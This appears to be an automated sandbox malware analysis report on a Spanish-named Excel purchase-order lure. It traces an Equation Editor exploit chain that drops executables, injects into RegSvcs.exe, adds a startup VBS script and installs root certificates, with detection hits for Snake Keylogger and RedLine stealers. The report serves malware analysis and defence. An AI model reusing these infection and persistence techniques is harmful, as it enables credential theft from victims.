Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@13/16@20/4

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_010637B5 GetLastError,FormatMessageW,

8_2_010637B5

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010510BF AdjustTokenPrivileges,CloseHandle,	8_2_010510BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	8_2_010516C3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013910BF AdjustTokenPrivileges,CloseHandle,	11_2_013910BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	11_2_013916C3

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_010651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

8_2_010651CD

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

5_2_00B9A67C

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

5_2_00B8648E

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

5_2_00B142A2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Orden de compra 0001-00255454.xlam.xlsx

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR71F4.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Orden de compra 0001-00255454.xlam.xlsx	Virustotal: Detection: 55%
Source: Orden de compra 0001-00255454.xlam.xlsx	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Orden de compra 0001-00255454.xlam.xlsx

Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.887613272.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000008.00000003.776938516.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.777173422.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.811942051.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.813355111.0000000002B70000.00000004.00001000.00020000.00000000.sdmp

Source: Orden de compra 0001-00255454.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029EFE76 push ecx; ret	5_3_029EFE89
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B30A76 push ecx; ret	5_2_00B30A89
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01010A76 push ecx; ret	8_2_01010A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041C40C push cs; iretd	9_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041C50E push cs; iretd	9_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E21D push ecx; ret	9_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041C6BE push ebx; ret	9_2_0041C6BF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01350A76 push ecx; ret	11_2_01350A89

Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Users\user\AppData\Roaming\negrett.exe	File created: C:\Users\user\AppData\Local\directory\name.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\negrett.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	8_2_0100F98E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01081C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	8_2_01081C41
